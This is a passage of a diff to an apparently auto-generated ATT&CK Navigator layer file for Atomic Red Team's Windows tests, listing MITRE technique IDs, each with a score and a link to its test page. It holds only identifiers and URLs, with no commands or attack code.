546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"
techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/
T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-
team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/
atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1
021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":
true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comme
nt":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"co
mment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/
